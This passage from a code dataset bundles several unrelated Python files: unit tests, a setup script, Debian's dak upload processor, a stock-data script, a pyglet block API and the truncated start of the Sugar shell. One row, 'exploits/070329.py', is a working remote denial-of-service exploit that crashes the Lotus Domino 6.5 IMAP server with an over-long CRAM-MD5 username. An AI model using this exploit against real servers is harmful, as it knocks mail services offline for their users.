code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
This test is a combination of unit and integration test.
It makes a connection with google spreadsheets to get a dummy test version of the
houseprint sheet. The sheet is called "unit and integration test houseprint"
Open that sheet to check some of the tests.
Created on Mon Dec 30 02:37:25 2013
@author: roel
"""
import os, sys
import unittest
import inspect
test_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# add the path to opengrid to sys.path
sys.path.append(os.path.join(test_dir, os.pardir, os.pardir))
from opengrid.library.houseprint import houseprint
class HouseprintTest(unittest.TestCase):
"""
Class for testing the class Houseprint
"""
@classmethod
def setUpClass(cls):
"""
Make the connection to the google drive spreadsheet only once.
This makes the test rather an integration than a unitttest.
All tests can use self.hp as the houseprint object
"""
cls.hp = houseprint.Houseprint(spreadsheet="unit and integration test houseprint")
@classmethod
def tearDownClass(cls):
pass
def test_parsing_sites(self):
"""Test parsing the sites"""
# check the site keys
sitekeys = [x.key for x in self.hp.sites]
self.assertListEqual(sitekeys, list(range(1,8)))
# some random attribute tests
self.assertEqual(self.hp.sites[6].size, 180)
self.assertEqual(self.hp.sites[5].inhabitants, 5)
self.assertEqual(self.hp.sites[4].postcode, 5000)
self.assertEqual(self.hp.sites[3].construction_year, 1950)
self.assertEqual(self.hp.sites[2].epc_cert, 102.27)
self.assertEqual(self.hp.sites[1].k_level, "")
def test_parsing_devices(self):
"""Test parsing devices"""
devicekeys = ["FL03001001","FL03001002","FL03001003a","FL03001003b","FL03001004","FL03001005","FL03001006","FL03001007"]
self.assertEqual([x.key for x in self.hp.get_devices()], devicekeys)
self.assertEqual(self.hp.get_devices()[1].site.key, 2)
def test_parsing_sensors(self):
"""Test parsing of sensors"""
sensorkeys = ['s'+ str(x) for x in range(1,21)]
self.assertListEqual([x.key for x in self.hp.get_sensors()], sensorkeys)
# test a specific sensor
s12 = self.hp.get_sensors()[11]
self.assertEqual(s12.key, 's12')
self.assertEqual(s12.token, 't12')
self.assertEqual(s12.device.key, 'FL03001002')
self.assertEqual(s12.type, 'water')
self.assertEqual(s12.description, 'Water house')
def test_get_sensors_by_type(self):
"""Searching for sensors by type should return only concerned sensors"""
watersensors = self.hp.get_sensors(sensortype='water')
self.assertEqual([x.key for x in watersensors], ['s6', 's12', 's13'])
def test_search_sites(self):
"""Searching sites based on site attributes"""
self.assertEqual(4, self.hp.search_sites(key=4)[0].key)
sites_with_3_inhabitants = self.hp.search_sites(inhabitants=3)
self.assertEqual([3,4], [x.key for x in sites_with_3_inhabitants])
def test_search_sensors(self):
"""Searching sensors based on sensor attributes"""
sensors = self.hp.search_sensors(system='grid')
self.assertEqual(['s1', 's2'], [x.key for x in sensors])
sensors = self.hp.search_sensors(type='electricity', direction='Import')
self.assertEqual(['s2'], [x.key for x in sensors])
def test_save_and_load(self):
"""Save a HP and load it back"""
self.hp.init_tmpo()
self.hp.save('test_saved_hp.hp')
hp2 = houseprint.load_houseprint_from_file('test_saved_hp.hp')
# Just comparing the old and new hp does not work: the sensors have the
# same attributes, but are different objects (different location in memory)
# As a solution, we check some of their attributes
s1_old = self.hp.get_sensors()[0]
s1_new = hp2.get_sensors()[0]
self.assertEqual(s1_old.site.key, s1_new.site.key)
for x in ["key", "type", "description", "system", "quantity", "unit", "direction", "tariff"]:
self.assertEqual(s1_old.__dict__[x], s1_new.__dict__[x])
self.assertIsNotNone(self.hp.get_tmpos())
self.hp.save('test_saved_hp.hp')
self.assertIsNotNone(self.hp.get_tmpos())
if __name__ == '__main__':
# http://stackoverflow.com/questions/4005695/changing-order-of-unit-tests-in-python
if sys.version_info.major == 3: #compatibility python 3
ln = lambda f: getattr(HouseprintTest, f).__code__.co_firstlineno #functions have renamed attributes
lncmp = lambda _, a, b: (ln(a) > ln(b)) - (ln(a) < ln(b)) #cmp() was deprecated, see https://docs.python.org/3.0/whatsnew/3.0.html
else:
ln = lambda f: getattr(HouseprintTest, f).im_func.func_code.co_firstlineno
lncmp = lambda _, a, b: cmp(ln(a), ln(b))
unittest.TestLoader.sortTestMethodsUsing = lncmp
#unittest.main()
suite1 = unittest.TestLoader().loadTestsFromTestCase(HouseprintTest)
alltests = unittest.TestSuite([suite1])
#selection = unittest.TestSuite()
#selection.addTest(HouseprintTest('test_get_sensor'))
unittest.TextTestRunner(verbosity=1, failfast=False).run(alltests)
|
EnergyID/opengrid
|
tests/test_houseprint.py
|
Python
|
gpl-2.0
| 5,610
|
# -*- coding: utf-8 -*-
# vim: autoindent shiftwidth=4 expandtab textwidth=120 tabstop=4 softtabstop=4
###############################################################################
# OpenLP - Open Source Lyrics Projection #
# --------------------------------------------------------------------------- #
# Copyright (c) 2008-2015 OpenLP Developers #
# --------------------------------------------------------------------------- #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation; version 2 of the License. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; if not, write to the Free Software Foundation, Inc., 59 #
# Temple Place, Suite 330, Boston, MA 02111-1307 USA #
###############################################################################
"""
This module contains tests for the lib submodule of the Bibles plugin.
"""
from unittest import TestCase
from openlp.plugins.bibles import lib
from openlp.plugins.bibles.lib import SearchResults
from tests.functional import MagicMock, patch
class TestLib(TestCase):
"""
Test the functions in the :mod:`lib` module.
"""
def get_reference_separator_test(self):
"""
Test the get_reference_separator method
"""
# GIVEN: A list of expected separators
separators = {'sep_r': '\\s*(?:e)\\s*', 'sep_e_default': 'end', 'sep_v_display': 'w', 'sep_l_display': 'r',
'sep_v_default': ':|v|V|verse|verses', 'sep_l': '\\s*(?:r)\\s*', 'sep_l_default': ',|and',
'sep_e': '\\s*(?:t)\\s*', 'sep_v': '\\s*(?:w)\\s*', 'sep_r_display': 'e', 'sep_r_default': '-|to'}
def side_effect():
lib.REFERENCE_SEPARATORS = separators
with patch('openlp.plugins.bibles.lib.update_reference_separators',
**{'side_effect': side_effect}) as mocked_update_reference_separators:
# WHEN: Calling get_reference_separator
for key, value in separators.items():
ret = lib.get_reference_separator(key)
# THEN: get_reference_separator should return the correct separator
self.assertEqual(separators[key], value)
mocked_update_reference_separators.assert_called_once_with()
def search_results_creation_test(self):
"""
Test the creation and construction of the SearchResults class
"""
# GIVEN: A book, chapter and a verse list
book = 'Genesis'
chapter = 1
verse_list = {
1: 'In the beginning God created the heavens and the earth.',
2: 'The earth was without form and void, and darkness was over the face of the deep. And the Spirit of '
'God was hovering over the face of the waters.'
}
# WHEN: We create the search results object
search_results = SearchResults(book, chapter, verse_list)
# THEN: It should have a book, a chapter and a verse list
self.assertIsNotNone(search_results, 'The search_results object should not be None')
self.assertEqual(search_results.book, book, 'The book should be "Genesis"')
self.assertEqual(search_results.chapter, chapter, 'The chapter should be 1')
self.assertDictEqual(search_results.verse_list, verse_list, 'The verse lists should be identical')
def search_results_has_verse_list_test(self):
"""
Test that a SearchResults object with a valid verse list returns True when checking ``has_verse_list()``
"""
# GIVEN: A valid SearchResults object with a proper verse list
search_results = SearchResults('Genesis', 1, {1: 'In the beginning God created the heavens and the earth.'})
# WHEN: We check that the SearchResults object has a verse list
has_verse_list = search_results.has_verse_list()
# THEN: It should be True
self.assertTrue(has_verse_list, 'The SearchResults object should have a verse list')
def search_results_has_no_verse_list_test(self):
"""
Test that a SearchResults object with an empty verse list returns False when checking ``has_verse_list()``
"""
# GIVEN: A valid SearchResults object with an empty verse list
search_results = SearchResults('Genesis', 1, {})
# WHEN: We check that the SearchResults object has a verse list
has_verse_list = search_results.has_verse_list()
# THEN: It should be False
self.assertFalse(has_verse_list, 'The SearchResults object should have a verse list')
|
crossroadchurch/paul
|
tests/functional/openlp_plugins/bibles/test_lib.py
|
Python
|
gpl-2.0
| 5,304
|
#!/usr/bin/python
import os
from setuptools import setup, find_packages
import progressbar
# TODO: I don't believe this should be in here. This should be done on package
# creation only
try:
readme = 'README.txt'
info = 'progressbar/__init__.py'
if (not os.path.exists(readme) or
os.stat(info).st_mtime > os.stat(readme).st_mtime):
open(readme,'w').write(progressbar.__doc__)
except: pass
setup(
name='progressbar',
version=progressbar.__version__,
packages=find_packages(),
description=progressbar.__doc__.split('\n')[0],
long_description=progressbar.__doc__,
author=progressbar.__author__,
maintainer=progressbar.__author__,
author_email=progressbar.__author_email__,
maintainer_email=progressbar.__author_email__,
url='http://code.google.com/p/python-progressbar',
license='LICENSE.txt',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: '
'GNU Library or Lesser General Public License (LGPL)',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: User Interfaces',
'Topic :: Terminals'
],
)
|
henrythasler/TileGenerator
|
docs/progressbar-2.3/setup.py
|
Python
|
gpl-2.0
| 1,821
|
#!/usr/bin/env python
# -*- coding:gbk -*-
import sys
import re
import os
import string
import urllib
import urllib2
import datetime
import binascii
import shutil
#from openpyxl import Workbook
#from openpyxl.reader.excel import load_workbook
#from internal.common import *
#from internal.ts_common import *
from internal.tingfupai import *
from internal.trade_date import *
from internal.url_juchao.tips_res import *
#Main
if __name__=="__main__":
curdate = ''
bLast = 0
#curdate, bLast = get_date_with_last()
curdate = get_lastday()
bLast = 1
print curdate, bLast
res_data = get_tingfupai_res(curdate)
if res_data is None:
exit(0)
stockCode = []
stockName = []
totalline = 0
prepath = "../data/"
prepath1 = "../data/entry/fupai/"
filename = prepath + 'fupai'
filetxt = filename + '.txt'
fl = open(filetxt, 'w')
totalline = get_all_fupai_data(res_data, fl, 0, curdate, stockCode, stockName)
#½«ËùÓеÄÊý¾Ý»ã×ÜÊä³ö
if bLast==1:
list_stock_rt(stockCode, curdate, fl)
else:
if bLast==0:
list_fupai_trade(stockCode, stockName, curdate, fl)
fl.close()
if (totalline==0):
print "No Matched Record"
os.remove(filetxt)
else:
prepath1 = prepath1 + "fupai" + curdate + ".txt"
shutil.copy(filetxt, prepath1)
|
yudingding6197/fin_script
|
fupai.py
|
Python
|
gpl-2.0
| 1,247
|
#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows
# 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the service
# this is likely to work on other windows platform aswell. Maybe someone can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no reponsibility for any screw ups caused by using this code
# Winny Thomas :-)
#
import sys
import md5
import struct
import base64
import socket
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a001 authenticate cram-md5\r\n'
sock.send(auth)
response = sock.recv(1024)
print response
# prepare digest of the response from server
m = md5.new()
m.update(response[2:0])
digest = m.digest()
payload = 'A' * 256
# the following DWORD is stored in ECX
# at the time of overflow the following call is made
# call dword ptr [ecx]. However i couldnt find suitable conditions under which a stable pointer to our shellcode
# could be used. Actually i have not searched hard enough :-).
payload += struct.pack('<L', 0x58585858)
# Base64 encode the user info to the server
login = payload + ' ' + digest
login = base64.encodestring(login) + '\r\n'
sock.send(login)
response = sock.recv(1024)
print response
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <imap server>\n' % sys.argv[0]
sys.exit(-1)
ExploitLotus(target)
|
knightmare2600/d4rkc0de
|
exploits/070329.py
|
Python
|
gpl-2.0
| 1,818
|
#!/usr/bin/env python
"""
Checks Debian packages from Incoming
@contact: Debian FTP Master <ftpmaster@debian.org>
@copyright: 2000, 2001, 2002, 2003, 2004, 2005, 2006 James Troup <james@nocrew.org>
@copyright: 2009 Joerg Jaspert <joerg@debian.org>
@copyright: 2009 Mark Hymers <mhy@debian.org>
@copyright: 2009 Frank Lichtenheld <djpig@debian.org>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# based on process-unchecked and process-accepted
## pu|pa: locking (daily.lock)
## pu|pa: parse arguments -> list of changes files
## pa: initialize urgency log
## pu|pa: sort changes list
## foreach changes:
### pa: load dak file
## pu: copy CHG to tempdir
## pu: check CHG signature
## pu: parse changes file
## pu: checks:
## pu: check distribution (mappings, rejects)
## pu: copy FILES to tempdir
## pu: check whether CHG already exists in CopyChanges
## pu: check whether FILES already exist in one of the policy queues
## for deb in FILES:
## pu: extract control information
## pu: various checks on control information
## pu|pa: search for source (in CHG, projectb, policy queues)
## pu|pa: check whether "Version" fulfills target suite requirements/suite propagation
## pu|pa: check whether deb already exists in the pool
## for src in FILES:
## pu: various checks on filenames and CHG consistency
## pu: if isdsc: check signature
## for file in FILES:
## pu: various checks
## pu: NEW?
## //pu: check whether file already exists in the pool
## pu: store what "Component" the package is currently in
## pu: check whether we found everything we were looking for in CHG
## pu: check the DSC:
## pu: check whether we need and have ONE DSC
## pu: parse the DSC
## pu: various checks //maybe drop some of the in favor of lintian
## pu|pa: check whether "Version" fulfills target suite requirements/suite propagation
## pu: check whether DSC_FILES is consistent with "Format"
## for src in DSC_FILES:
## pu|pa: check whether file already exists in the pool (with special handling for .orig.tar.gz)
## pu: create new tempdir
## pu: create symlink mirror of source
## pu: unpack source
## pu: extract changelog information for BTS
## //pu: create missing .orig symlink
## pu: check with lintian
## for file in FILES:
## pu: check checksums and sizes
## for file in DSC_FILES:
## pu: check checksums and sizes
## pu: CHG: check urgency
## for deb in FILES:
## pu: extract contents list and check for dubious timestamps
## pu: check that the uploader is actually allowed to upload the package
### pa: install:
### if stable_install:
### pa: remove from p-u
### pa: add to stable
### pa: move CHG to morgue
### pa: append data to ChangeLog
### pa: send mail
### pa: remove .dak file
### else:
### pa: add dsc to db:
### for file in DSC_FILES:
### pa: add file to file
### pa: add file to dsc_files
### pa: create source entry
### pa: update source associations
### pa: update src_uploaders
### for deb in FILES:
### pa: add deb to db:
### pa: add file to file
### pa: find source entry
### pa: create binaries entry
### pa: update binary associations
### pa: .orig component move
### pa: move files to pool
### pa: save CHG
### pa: move CHG to done/
### pa: change entry in queue_build
## pu: use dispatch table to choose target queue:
## if NEW:
## pu: write .dak file
## pu: move to NEW
## pu: send mail
## elsif AUTOBYHAND:
## pu: run autobyhand script
## pu: if stuff left, do byhand or accept
## elsif targetqueue in (oldstable, stable, embargo, unembargo):
## pu: write .dak file
## pu: check overrides
## pu: move to queue
## pu: send mail
## else:
## pu: write .dak file
## pu: move to ACCEPTED
## pu: send mails
## pu: create files for BTS
## pu: create entry in queue_build
## pu: check overrides
# Integrity checks
## GPG
## Parsing changes (check for duplicates)
## Parse dsc
## file list checks
# New check layout (TODO: Implement)
## Permission checks
### suite mappings
### ACLs
### version checks (suite)
### override checks
## Source checks
### copy orig
### unpack
### BTS changelog
### src contents
### lintian
### urgency log
## Binary checks
### timestamps
### control checks
### src relation check
### contents
## Database insertion (? copy from stuff)
### BYHAND / NEW / Policy queues
### Pool
## Queue builds
import datetime
import errno
import fcntl
import os
import sys
import traceback
import apt_pkg
import time
from sqlalchemy.orm.exc import NoResultFound
from daklib import daklog
from daklib.dbconn import *
from daklib.urgencylog import UrgencyLog
from daklib.summarystats import SummaryStats
from daklib.config import Config
import daklib.utils as utils
from daklib.regexes import *
import daklib.announce
import daklib.archive
import daklib.checks
import daklib.upload
###############################################################################
Options = None
Logger = None
###############################################################################
def usage (exit_code=0):
print """Usage: dak process-upload [OPTION]... [CHANGES]...
-a, --automatic automatic run
-d, --directory <DIR> process uploads in <DIR>
-h, --help show this help and exit.
-n, --no-action don't do anything
-p, --no-lock don't check lockfile !! for cron.daily only !!
-s, --no-mail don't send any mail
-V, --version display the version number and exit"""
sys.exit(exit_code)
###############################################################################
def try_or_reject(function):
"""Try to call function or reject the upload if that fails
"""
def wrapper(directory, upload, *args, **kwargs):
reason = 'No exception caught. This should not happen.'
try:
return function(directory, upload, *args, **kwargs)
except (daklib.archive.ArchiveException, daklib.checks.Reject) as e:
reason = unicode(e)
except Exception as e:
reason = "There was an uncaught exception when processing your upload:\n{0}\nAny original reject reason follows below.".format(traceback.format_exc())
try:
upload.rollback()
return real_reject(directory, upload, reason=reason)
except Exception as e:
reason = "In addition there was an exception when rejecting the package:\n{0}\nPrevious reasons:\n{1}".format(traceback.format_exc(), reason)
upload.rollback()
return real_reject(directory, upload, reason=reason, notify=False)
raise Exception('Rejecting upload failed after multiple tries. Giving up. Last reason:\n{0}'.format(reason))
return wrapper
def get_processed_upload(upload):
changes = upload.changes
control = upload.changes.changes
pu = daklib.announce.ProcessedUpload()
pu.maintainer = control.get('Maintainer')
pu.changed_by = control.get('Changed-By')
pu.fingerprint = changes.primary_fingerprint
pu.suites = upload.final_suites or []
pu.from_policy_suites = []
pu.changes = open(upload.changes.path, 'r').read()
pu.changes_filename = upload.changes.filename
pu.sourceful = upload.changes.sourceful
pu.source = control.get('Source')
pu.version = control.get('Version')
pu.architecture = control.get('Architecture')
pu.bugs = changes.closed_bugs
pu.program = "process-upload"
pu.warnings = upload.warnings
return pu
@try_or_reject
def accept(directory, upload):
cnf = Config()
Logger.log(['ACCEPT', upload.changes.filename])
print "ACCEPT"
upload.install()
process_buildinfos(upload)
accepted_to_real_suite = any(suite.policy_queue is None for suite in upload.final_suites)
sourceful_upload = 'source' in upload.changes.architectures
control = upload.changes.changes
if sourceful_upload and not Options['No-Action']:
urgency = control.get('Urgency')
# As per policy 5.6.17, the urgency can be followed by a space and a
# comment. Extract only the urgency from the string.
if ' ' in urgency:
(urgency, comment) = urgency.split(' ', 1)
if urgency not in cnf.value_list('Urgency::Valid'):
urgency = cnf['Urgency::Default']
UrgencyLog().log(control['Source'], control['Version'], urgency)
pu = get_processed_upload(upload)
daklib.announce.announce_accept(pu)
# Move .changes to done, but only for uploads that were accepted to a
# real suite. process-policy will handle this for uploads to queues.
if accepted_to_real_suite:
src = os.path.join(upload.directory, upload.changes.filename)
now = datetime.datetime.now()
donedir = os.path.join(cnf['Dir::Done'], now.strftime('%Y/%m/%d'))
dst = os.path.join(donedir, upload.changes.filename)
dst = utils.find_next_free(dst)
upload.transaction.fs.copy(src, dst, mode=0o644)
SummaryStats().accept_count += 1
SummaryStats().accept_bytes += upload.changes.bytes
@try_or_reject
def accept_to_new(directory, upload):
Logger.log(['ACCEPT-TO-NEW', upload.changes.filename])
print "ACCEPT-TO-NEW"
upload.install_to_new()
# TODO: tag bugs pending
pu = get_processed_upload(upload)
daklib.announce.announce_new(pu)
SummaryStats().accept_count += 1
SummaryStats().accept_bytes += upload.changes.bytes
@try_or_reject
def reject(directory, upload, reason=None, notify=True):
real_reject(directory, upload, reason, notify)
def real_reject(directory, upload, reason=None, notify=True):
# XXX: rejection itself should go to daklib.archive.ArchiveUpload
cnf = Config()
Logger.log(['REJECT', upload.changes.filename])
print "REJECT"
fs = upload.transaction.fs
rejectdir = cnf['Dir::Reject']
files = [ f.filename for f in upload.changes.files.itervalues() ]
files.append(upload.changes.filename)
for fn in files:
src = os.path.join(upload.directory, fn)
dst = utils.find_next_free(os.path.join(rejectdir, fn))
if not os.path.exists(src):
continue
fs.copy(src, dst)
if upload.reject_reasons is not None:
if reason is None:
reason = ''
reason = reason + '\n' + '\n'.join(upload.reject_reasons)
if reason is None:
reason = '(Unknown reason. Please check logs.)'
dst = utils.find_next_free(os.path.join(rejectdir, '{0}.reason'.format(upload.changes.filename)))
fh = fs.create(dst)
fh.write(reason)
fh.close()
if notify:
pu = get_processed_upload(upload)
daklib.announce.announce_reject(pu, reason)
SummaryStats().reject_count += 1
###############################################################################
def action(directory, upload):
changes = upload.changes
processed = True
global Logger
cnf = Config()
okay = upload.check()
summary = changes.changes.get('Changes', '')
package_info = []
if okay:
if changes.source is not None:
package_info.append("source:{0}".format(changes.source.dsc['Source']))
for binary in changes.binaries:
package_info.append("binary:{0}".format(binary.control['Package']))
(prompt, answer) = ("", "XXX")
if Options["No-Action"] or Options["Automatic"]:
answer = 'S'
print summary
print
print "\n".join(package_info)
print
if len(upload.warnings) > 0:
print "\n".join(upload.warnings)
print
if len(upload.reject_reasons) > 0:
print "Reason:"
print "\n".join(upload.reject_reasons)
print
path = os.path.join(directory, changes.filename)
created = os.stat(path).st_mtime
now = time.time()
too_new = (now - created < int(cnf['Dinstall::SkipTime']))
if too_new:
print "SKIP (too new)"
prompt = "[S]kip, Quit ?"
else:
prompt = "[R]eject, Skip, Quit ?"
if Options["Automatic"]:
answer = 'R'
elif upload.new:
prompt = "[N]ew, Skip, Quit ?"
if Options['Automatic']:
answer = 'N'
else:
prompt = "[A]ccept, Skip, Quit ?"
if Options['Automatic']:
answer = 'A'
while prompt.find(answer) == -1:
answer = utils.our_raw_input(prompt)
m = re_default_answer.match(prompt)
if answer == "":
answer = m.group(1)
answer = answer[:1].upper()
if answer == 'R':
reject(directory, upload)
elif answer == 'A':
# upload.try_autobyhand must not be run with No-Action.
if Options['No-Action']:
accept(directory, upload)
elif upload.try_autobyhand():
accept(directory, upload)
else:
print "W: redirecting to BYHAND as automatic processing failed."
accept_to_new(directory, upload)
elif answer == 'N':
accept_to_new(directory, upload)
elif answer == 'Q':
sys.exit(0)
elif answer == 'S':
processed = False
if not Options['No-Action']:
upload.commit()
return processed
###############################################################################
def unlink_if_exists(path):
try:
os.unlink(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def process_it(directory, changes, keyrings):
global Logger
print "\n{0}\n".format(changes.filename)
Logger.log(["Processing changes file", changes.filename])
with daklib.archive.ArchiveUpload(directory, changes, keyrings) as upload:
processed = action(directory, upload)
if processed and not Options['No-Action']:
session = DBConn().session()
history = SignatureHistory.from_signed_file(upload.changes)
if history.query(session) is None:
session.add(history)
session.commit()
session.close()
unlink_if_exists(os.path.join(directory, changes.filename))
for fn in changes.files:
unlink_if_exists(os.path.join(directory, fn))
###############################################################################
def process_changes(changes_filenames):
session = DBConn().session()
keyrings = session.query(Keyring).filter_by(active=True).order_by(Keyring.priority)
keyring_files = [ k.keyring_name for k in keyrings ]
session.close()
changes = []
for fn in changes_filenames:
try:
directory, filename = os.path.split(fn)
c = daklib.upload.Changes(directory, filename, keyring_files)
changes.append([directory, c])
except Exception as e:
Logger.log([filename, "Error while loading changes: {0}".format(e)])
changes.sort(key=lambda x: x[1])
for directory, c in changes:
process_it(directory, c, keyring_files)
def process_buildinfos(upload):
cnf = Config()
if 'Dir::BuildinfoArchive' not in cnf:
return
target_dir = os.path.join(
cnf['Dir::BuildinfoArchive'],
datetime.datetime.now().strftime('%Y/%m/%d'),
)
for f in upload.changes.buildinfo_files:
src = os.path.join(upload.directory, f.filename)
dst = utils.find_next_free(os.path.join(target_dir, f.filename))
Logger.log(["Archiving", f.filename])
upload.transaction.fs.copy(src, dst, mode=0o644)
###############################################################################
def main():
global Options, Logger
cnf = Config()
summarystats = SummaryStats()
Arguments = [('a',"automatic","Dinstall::Options::Automatic"),
('h',"help","Dinstall::Options::Help"),
('n',"no-action","Dinstall::Options::No-Action"),
('p',"no-lock", "Dinstall::Options::No-Lock"),
('s',"no-mail", "Dinstall::Options::No-Mail"),
('d',"directory", "Dinstall::Options::Directory", "HasArg")]
for i in ["automatic", "help", "no-action", "no-lock", "no-mail",
"version", "directory"]:
key = "Dinstall::Options::%s" % i
if key not in cnf:
cnf[key] = ""
changes_files = apt_pkg.parse_commandline(cnf.Cnf, Arguments, sys.argv)
Options = cnf.subtree("Dinstall::Options")
if Options["Help"]:
usage()
# -n/--dry-run invalidates some other options which would involve things happening
if Options["No-Action"]:
Options["Automatic"] = ""
# Obtain lock if not in no-action mode and initialize the log
if not Options["No-Action"]:
lock_fd = os.open(os.path.join(cnf["Dir::Lock"], 'process-upload.lock'), os.O_RDWR | os.O_CREAT)
try:
fcntl.flock(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as e:
if e.errno in (errno.EACCES, errno.EAGAIN):
utils.fubar("Couldn't obtain lock; assuming another 'dak process-upload' is already running.")
else:
raise
# Initialise UrgencyLog() - it will deal with the case where we don't
# want to log urgencies
urgencylog = UrgencyLog()
Logger = daklog.Logger("process-upload", Options["No-Action"])
# If we have a directory flag, use it to find our files
if cnf["Dinstall::Options::Directory"] != "":
# Note that we clobber the list of files we were given in this case
# so warn if the user has done both
if len(changes_files) > 0:
utils.warn("Directory provided so ignoring files given on command line")
changes_files = utils.get_changes_files(cnf["Dinstall::Options::Directory"])
Logger.log(["Using changes files from directory", cnf["Dinstall::Options::Directory"], len(changes_files)])
elif not len(changes_files) > 0:
utils.fubar("No changes files given and no directory specified")
else:
Logger.log(["Using changes files from command-line", len(changes_files)])
process_changes(changes_files)
if summarystats.accept_count:
sets = "set"
if summarystats.accept_count > 1:
sets = "sets"
print "Installed %d package %s, %s." % (summarystats.accept_count, sets,
utils.size_type(int(summarystats.accept_bytes)))
Logger.log(["total", summarystats.accept_count, summarystats.accept_bytes])
if summarystats.reject_count:
sets = "set"
if summarystats.reject_count > 1:
sets = "sets"
print "Rejected %d package %s." % (summarystats.reject_count, sets)
Logger.log(["rejected", summarystats.reject_count])
if not Options["No-Action"]:
urgencylog.close()
Logger.close()
###############################################################################
if __name__ == '__main__':
main()
|
purism/pdak
|
dak/process_upload.py
|
Python
|
gpl-2.0
| 20,073
|
from pyglet.graphics import TextureGroup
from pyglet import image
from pyglet.gl import *
glEnable(GL_CULL_FACE)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
tex = TextureGroup(image.load('modules\\icon.png').get_texture())
class NewBlock(object):
def __init__(self):
self.name= "Unnamed Block"
self.strength = 1
self.hardness = 1
self.flammable = False
self.north = tex
self.south = tex
self.east = tex
self.west = tex
self.top = tex
self.bottom = tex
self.behavior = False
self.tool = None
def NewFBlock(n, w, s, h, tt, tb, tn, ts, te, tw, f, b):
a = NewBlock()
a.name = n
a.strength = s
a.hardness = h
a.tool = w
a.north = tn
a.south = ts
a.east = te
a.west = tw
a.top = tt
a.bottom = tb
a.flammable = f
a.behavior = b
return a
def NewPBlock(n, w, s, h, t, f):
b = NewBlock()
b.name = n
b.strength = s
b.hardness = h
b.tool = w
b.north = t
b.south = t
b.east = t
b.west = t
b.top = t
b.bottom = t
b.flammable = f
return b
def Texture(f):
glEnable(GL_CULL_FACE)##Rem
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
return TextureGroup(image.load(f).get_texture())
def NewBL(m,i):
b=BL
b.mod=m
b.id=i
print b.id
return b
class BL(object):
def __init__(self):
self.mod=0
self.id=0
|
SVRobots/Minecraft
|
modules/api.py
|
Python
|
gpl-2.0
| 1,424
|
# Copyright (C) 2006, Red Hat, Inc.
# Copyright (C) 2009, One Laptop Per Child Association Inc
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from sugar3 import logger
logger.cleanup()
logger.start('shell')
import logging
logging.debug('STARTUP: Starting the shell')
import os
import sys
import subprocess
import shutil
# Change the default encoding to avoid UnicodeDecodeError
# http://lists.sugarlabs.org/archive/sugar-devel/2012-August/038928.html
reload(sys)
sys.setdefaultencoding('utf-8')
import gettext
from dbus.mainloop.glib import DBusGMainLoop
DBusGMainLoop(set_as_default=True)
from gi.repository import Gio
from gi.repository import GLib
from gi.repository import Gtk
from gi.repository import Gst
from gi.repository import Wnck
from sugar3 import env
from jarabe.model.session import get_session_manager
from jarabe.model.update import updater
from jarabe.model import screen
from jarabe.view import keyhandler
from jarabe.view import gesturehandler
from jarabe.view import cursortracker
from jarabe.journal import journalactivity
from jarabe.model import notifications
from jarabe.model import filetransfer
from jarabe.view import launcher
from jarabe.model import keyboard
from jarabe.desktop import homewindow
from jarabe import config
from jarabe.model.sound import sound
from jarabe import intro
from jarabe.intro.window import IntroWindow
from jarabe.intro.window import create_profile_with_nickname
from jarabe import frame
from jarabe.view.service import UIService
from jarabe import apisocket
from jarabe import testrunner
_metacity_process = None
_window_manager_started = False
_starting_desktop = False
def unfreeze_dcon_cb():
logging.debug('STARTUP: unfreeze_dcon_cb')
screen.set_dcon_freeze(0)
def setup_frame_cb():
